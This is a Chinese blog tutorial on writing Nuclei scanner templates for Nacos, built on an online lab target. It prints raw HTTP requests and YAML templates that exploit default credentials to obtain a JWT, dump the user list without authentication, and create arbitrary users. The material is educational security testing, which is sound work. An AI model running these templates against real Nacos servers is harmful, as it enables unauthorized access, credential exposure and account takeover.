Nuclei Paltform初体验

于 2024-07-17 16:30:06 发布
阅读量236 收藏 4
点赞数 3
文章标签: 漏洞挖掘 渗透测试 网络安全 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/140490076
版权

前言

环境来自于在线靶场

1、Poc开发工具介绍

Nuclei:https://nuclei.projectdiscovery.io/
Cloud Platfrom云平台:https://cloud.projectdiscovery.io/

2、目标站点简介

目标演示站点:http://glkb-jqe1.aqlab.cn/nacos/#/login
指纹:Nacos
已知常用漏洞利用:Nacos弱口令 账密:nacos/nacos
Nacos 敏感信息泄露 /nacos/v1/auth/users?pageNo=1&pageSize=9
Nacos 任意用户创建:/nacos/v1/auth/users?accessToken=

3、自定义Poc

Nacos通用弱口令:
报文:

POST /nacos/v1/auth/users/login HTTP/1.1
Host: glkb-jqe1.aqlab.cn
Content-Length: 42
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://glkb-jqe1.aqlab.cn
Referer: http://glkb-jqe1.aqlab.cn/nacos/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=nacos&password=nacos

返回JWT

图片


匹配规则:https://docs.projectdiscovery.io/templates/reference/matchers

图片


提取规则:https://docs.projectdiscovery.io/templates/reference/extractors

图片


根据响应body,提取jwt全段值或部分值均可
RE:(eyJ[A-Za-z0-9-]{10,}.[A-Za-z0-9.-]{10,}|eyJ[A-Za-z0-9\/+-]{10,}.[A-Za-z0-9.\/+-]{10,})
效果demo:

图片

Nacos Information敏感信息泄露

GET /nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken= HTTP/1.1
Host: glkb-jqe1.aqlab.cn
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

demo

id: Nacos-InformationForUser

info:
  name: Nacos-InformationForUser
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  tags: nacos

requests:
  - raw:
      - |+
        GET /nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken= HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_any(body,"username","password")  && status_code==200

图片

Nacos AuthUserBypass

POST /nacos/v1/auth/users?accessToken= HTTP/1.1
Host: glkb-jqe1.aqlab.cn
Content-Length: 25
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=222&password=222

demo

id: Nacos-NotAuth-AnyUserCreate

info:
  name: Nacos-NotAuth-AnyUserCreate
  author: xxx
  severity: info
  description: description
  reference:
    - https://
variables:
  username: "{{to_lower(rand_base(6))}}"
  tags: nacos

requests:
  - raw:
      - |-
        POST /nacos/v1/auth/users?accessToken= HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Length: 32

        username={{username}}&password={{username}}
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_any(body,"ok")  && status_code==200

Worlkfolw工作流

id: Nacos-Workflower

info:
  name: Nacos-Workflower
  author: xxx
  severity: info
  description: Description of the Template
workflows:
  - template: path\Nacos-NotAuth-AnyUserCreate.yaml
  - template: path\Nacos-InformationForUser.yaml
  - tags: nacos

DEMO

图片

免    /     费     /     资    /     料    :

  zkaq567

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

运维Z叔
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Nuclei文*件上*传FUZZ POC
afei001
02-16 492
该文件上传FUZZ POC主要来源于一个靶*场,该POC 主要用来FUZZ目标js页面中的upload ajax请求,以此来进一步尝试文件上传漏*洞利*用。
Nuclei Poc开发
2301_80127209的博客
03-25 658
Cloud Platfrom云平台:https://cloud.projectdiscovery.io/目标演示站点:http://glkb-jqe1.aqlab.cn/nacos/#/login指纹:Nacos已知常用漏洞利用:Nacos弱口令 账密:nacos/nacosNacos 敏感信息泄露 /nacos/v1/auth/users?Nacos 任意用户创建:/nacos/v1/auth/users?Nacos通用弱口令:Win64;q=0.9返回JWT。
Nuclei POC编写小白速通指南
weixin_55762309的博客
05-25 1821
Nuclei POC编写小白速通指南
浅尝 Nuclei POC 编写
qq_46081990的博客
12-21 4026
本文讲解了如何使用 YAML 语言编写漏扫工具 Nuclei 的 POC,以两个不同类型的 CVE 为例,介绍了匹配结果和匹配交互的两种情况该如何编写 POC,最后引入并介绍了一款辅助生成 Nuclei POC 模板的 BurpSuite 插件(Nuclei Template Generator Plugin)
漏洞扫描-nuclei-poc编写
告白的博客
11-10 942
Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。提供TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。提取器/匹配器:提取,匹配返回包内容,匹配出需要的目标(根据目标结果特征用匹配还是提取)http:漏洞利用核心, {{xx}}:提取目标地址的匹配信息。info:漏洞描述情况(级别,编号,标签,简介等)不允许tab,只能空格。
Fiora-为PoC框架nuclei提供图形界面
02-07
Fiora项目致力于为Nuclei PoC框架提供一个图形用户界面(GUI),以提高用户体验,使安全分析过程更为直观和简便。 Fiora的功能特点包括: 1. **快速搜索**:通过GUI,用户可以轻松地搜索Nuclei模板库,找到与目标...
nuclei对上传文件内容相关控制
01-26
nuclei对上传文件内容相关控制
nuclei-docs:核文件
04-03
Nuclei文档网站的Github项目 nuclei-docs的本地版本安装mkdocs python3 -m pip install mkdocspython3 -m pip install pymdown-extensions>=7.0 --userpython3 -m pip install mkdocs-material-extensions>=1.0 --...
nuclei 漏洞扫描工具
05-06
**Nuclei漏洞扫描工具详解** Nuclei是一款快速、可配置且轻量级的漏洞扫描工具,专门设计用于安全研究人员和渗透测试人员快速发现目标系统中的已知漏洞。这款工具以其高效和易于使用的特性在IT安全领域内备受推崇。...
nuclei-3.0.1-windows-amd64
06-05
nuclei-3.0.1-windows-amd64】是针对Windows操作系统64位架构的Nuclei工具的版本。Nuclei是一款快速、可配置的、基于模板的安全扫描工具,主要用于网络扫描和渗透测试,以检测目标系统中的已知漏洞。它是由安全...
nuclei poc模板编写笔记(一)
A10ng_的博客
08-29 7810
笔记
Nuclei Yaml模板编写漏洞poc(转发)
mingyqf的博客
10-19 1053
Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。
POC模拟攻击利器 —— Nuclei入门(一)
热门推荐
liwenxiang629的博客
07-26 1万+
Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。Nuclei使用零误报的定制模板向目标发送请求,同时可以对大量主机进行快速扫描。Nuclei提供TCP、DNS、HTTP、FILE等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。.........
POC检测工具-nuclei(四)
siu~
07-28 5176
nuclei是一款基于简单的 YAML DSL 的快速且可定制的漏洞扫描器。
nuclei poc模板编写笔记(二)
A10ng_的博客
08-29 5201
笔记
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞
XXokok的博客
12-09 1812
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞。使用工具一键生成Yaml文件
nuclei 工具
qq_69775412的博客
02-19 2184
Nuclei是一款由GO语言编写的扫描器,它内置大量poc模板,并且也可以自己编写模板。同时可以对主机进行批量快速扫描。Nuclei提供TCP、DNS、HTTP、FILE等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。
【渗透工具】Nuclei POC—整合全网Nuclei的漏洞POC
最新发布
TT小子的博客
06-27 809
Nuclei POC,每日更新 | 自动整合全网Nuclei的漏洞POC,实时同步更新最新POC,保存已被删除的POC。通过批量克隆Github项目,获取Nuclei POC,并将POC按类别分类存放,使用Github Action实现(已有11wPOC)这个项目是一个 Python 脚本,用于批量克隆 GitHub 项目,获取 Nuclei POC,并将 POC 按类别分类存放到文件夹中。同时,使用 GitHub Action 每日自动运行脚本。
聊聊 Nuclei YAML 语法模版及 Pocsuite3 的兼容思路
xxwn202302的博客
08-10 990
Pocsuite3 是由知道创宇 404 实验室打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架【1】。框架本身使用 Python3 开发,集成了ZoomEye、Shodan、CEye、Interactsh 等众多安全服务的 API,用户可以基于 Pocsuite3 快速编写PoC/Exp,对批量目标进行漏洞验证并获取汇总结果。Nuclei 是一款由 projectdiscovery 开源的基于 YAML 语法模板的定制化快速漏洞扫描器【2】。Nuclei
Nuclei:防范上传文件痕迹与内容控制策略
渗透测试中,nuclei 是一个强大的静态应用安全扫描器,它特别关注 web 应用程序的安全漏洞,其中包括文件上传功能的潜在风险。文件上传内容相关控制是确保系统安全的关键环节,因为恶意用户可能会利用这些漏洞上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值